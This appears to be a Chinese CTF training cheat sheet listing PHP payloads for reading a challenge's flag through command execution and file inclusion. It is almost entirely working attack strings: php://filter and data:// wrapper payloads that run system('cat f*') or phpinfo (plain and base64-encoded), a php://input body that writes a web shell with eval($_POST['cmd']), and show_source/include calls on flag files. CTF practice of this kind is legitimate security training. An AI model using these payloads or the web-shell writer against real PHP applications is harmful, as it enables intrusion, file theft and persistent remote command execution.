命令执行:查看代码/flag的几种方式

一、PHP伪协议

php://filter/read=convert.base64-encode/resource=flag.php

data://text/plain,<?php system(“cat f*”); ?>

data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTsgPz4=

无任何过滤:

data://text/plain,<?php phpinfo()?>

不得出现PHP < ? 字样:

data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

data:text/plain,<?php phpinfo()?>

data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

php://input协议,可以尝试直接写shell或是调用system函数查看flag

[POST DATA]<?php fputs(fopen(“shell.php”,”w”),'<?php eval($_POST[“cmd”];?>’);?>

二、读取文件函数

c=show_source(‘flag.php’);

c=highlight_file(‘flag.php’);

三、flag为txt文件但位于根目录

c=include(‘/flag.txt’)

 

Tips:鼠标经过代码时会出现工具栏,工具栏上方有一键复制代码的功能哦~天云网络培训,专注于网络空间安全相关培训,并提供相关课程的在线培训 报名微信 tyedu1
天云网络培训 » 命令执行:查看代码/flag的几种方式

提供专业、易懂、平民化教育。让每个热爱网络的人有个归宿

立即查看 了解详情